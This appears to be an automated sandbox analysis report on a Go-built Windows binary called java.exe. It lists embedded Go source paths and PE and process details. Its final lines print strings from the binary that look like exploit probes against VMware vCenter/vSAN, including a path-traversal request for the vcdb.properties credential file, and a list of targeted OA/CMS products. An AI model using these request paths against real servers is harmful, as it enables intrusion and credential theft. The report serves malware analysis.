Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/fmt/format.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/fmt/print.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/fmt/scan.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/bytes/buffer.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/bytes/bytes.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/bytes/reader.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strings/builder.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strings/reader.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strings/replace.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strings/strings.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strings/search.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/bufio/bufio.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/bufio/scan.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/hex/hex.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/flag/flag.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/strconv/atob.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/url/url.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/bisect/bisect.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/godebug/godebug.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/godebugs/table.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/rand/exp.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/rand/rand.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/rand/normal.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/rand/rng.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/intern/intern.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/netip/leaf_alts.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/netip/netip.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/netip/uint128.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/context/context.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/vendor/golang.org/x/net/dns/dnsmessage/message.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/internal/singleflight/singleflight.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/addrselect.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/addrselect.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/net.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/ip.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/conf.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/dnsclient_unix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/lookup.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/nss.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/parse.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/dial.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/iprawsock.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/tcpsock.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/udpsock.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/unixsock.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/mptcpsock_stub.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/ipsock.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/dnsclient.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/dnsconfig.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/dnsconfig_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/fd_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/error_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/fd_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/file.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/hook.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/hosts.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/interface.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/interface_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/rawconn.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/iprawsock_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/ipsock_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/lookup_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/error_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/port.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/sendfile_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/sock_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/sock_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/sockopt_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/sockopt_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/tcpsock_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/tcpsockopt_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/tcpsockopt_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/udpsock_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/net/unixsock_posix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/syntax/compile.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/syntax/parse.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/syntax/prog.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/syntax/regexp.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/syntax/simplify.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/syntax/perl_groups.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/backtrack.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/exec.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/onepass.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/regexp/regexp.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/binary/binary.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/base64/base64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/decode.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/scanner.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/fold.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/encode.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/tags.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/indent.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/json/stream.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/github.com/mattn/go-isatty@v0.0.3/isatty_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/github.com/mattn/go-colorable@v0.0.9/colorable_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/github.com/fatih/color@v1.7.0/color.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/log/log.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/golang.org/x/net@v0.7.0/internal/socks/client.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/golang.org/x/net@v0.7.0/internal/socks/socks.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/golang.org/x/net@v0.7.0/proxy/dial.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/golang.org/x/net@v0.7.0/proxy/socks5.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/apic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yamlh.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/resolve.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/emitterc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yamlprivateh.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/encode.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/parserc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/readerc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/scannerc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/sorter.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/packages/pkg/mod/gopkg.in/yaml.v3@v3.0.1/writerc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/subtle/xor.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/subtle/xor_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/cipher/cbc.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/alias/alias.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/cipher/ctr.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/cipher/gcm.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/subtle/constant_time.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/cipher/io.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/crypto.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/boring/sig/sig_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/boring/notboring.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/aes/aes_gcm.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/aes/block.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/aes/cipher.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/aes/cipher_asm.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/aes/asm_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/aes/gcm_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p224.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p224_fiat64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p224_invert.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p384.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p384_fiat64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p384_invert.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p521.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p521_fiat64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/fiat/p521_invert.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/embed/embed.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p224.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p224_sqrt.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p256_asm.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p256_ordinv.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p384.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p521.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/nistec/p256_asm_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/randutil/randutil.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/field/fe.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/field/fe_arm64_noasm.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/field/fe_generic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/field/fe_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/ecdh/ecdh.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/ecdh/nist.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/ecdh/x25519.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/accuracy_string.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/arith.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/float.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/nat.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/int.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/intconv.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/natconv.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/intmarsh.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/natdiv.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/prime.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/arith_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/math/big/arith_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/elliptic/elliptic.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/elliptic/nistec.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/elliptic/nistec_p256.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/elliptic/params.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/bigmod/nat.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/bigmod/nat_asm.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/bigmod/nat_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha512/sha512.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha512/sha512block_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha512/sha512block.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha512/sha512block_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/asn1/asn1.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/asn1/common.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/asn1/marshal.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/vendor/golang.org/x/crypto/cryptobyte/asn1/asn1.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/vendor/golang.org/x/crypto/cryptobyte/builder.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/vendor/golang.org/x/crypto/cryptobyte/asn1.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/vendor/golang.org/x/crypto/cryptobyte/string.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/ecdsa/ecdsa.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/ecdsa/ecdsa_legacy.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/edwards25519.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/scalar.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/scalar_fiat.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/scalarmult.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/internal/edwards25519/tables.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/rand/rand.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/rand/rand_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/rand/util.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/ed25519/ed25519.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/rsa/rsa.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/rsa/pkcs1v15.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/rsa/pss.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha256/sha256.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha256/sha256block.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha256/sha256block_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha256/sha256block_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/encoding/pem/pem.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/dsa/dsa.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/pkix/pkix.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/des/block.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/des/cipher.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/md5/md5.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/md5/md5block_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha1/sha1.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha1/sha1block_amd64.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/sha1/sha1block_amd64.s
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/cert_pool.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/x509.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/parser.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/pkcs1.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/pkcs8.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/root.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/root_windows.go
Source: java.exeString found in binary or memory: /Users/adm1n/.asdf/installs/golang/1.21.3/go/src/crypto/x509/sec1.go
Source: C:\Users\user\Desktop\java.exeFile read: C:\Users\user\Desktop\java.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\java.exe "C:\Users\user\Desktop\java.exe"
Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\java.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\java.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\java.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\java.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\java.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\java.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\java.exeSection loaded: sspicli.dllJump to behavior
Source: java.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: java.exeStatic file information: File size 32847872 > 1048576
Source: java.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x7cf000
Source: java.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xf1f400
Source: java.exeStatic PE information: Raw size of /19 is bigger than: 0x100000 < 0x12e200
Source: java.exeStatic PE information: Raw size of /65 is bigger than: 0x100000 < 0x23bc00
Source: java.exeStatic PE information: Raw size of /78 is bigger than: 0x100000 < 0x1a4800
Source: java.exeStatic PE information: Raw size of .symtab is bigger than: 0x100000 < 0x1c5600
Source: java.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: java.exeStatic PE information: section name: .xdata
Source: java.exeStatic PE information: section name: /4
Source: java.exeStatic PE information: section name: /19
Source: java.exeStatic PE information: section name: /32
Source: java.exeStatic PE information: section name: /46
Source: java.exeStatic PE information: section name: /65
Source: java.exeStatic PE information: section name: /78
Source: java.exeStatic PE information: section name: /90
Source: java.exeStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\java.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: java.exeBinary or memory string: JEECMSseeyonweavertongdavmware
Source: java.exeBinary or memory string: path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
Source: java.exeBinary or memory string: path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
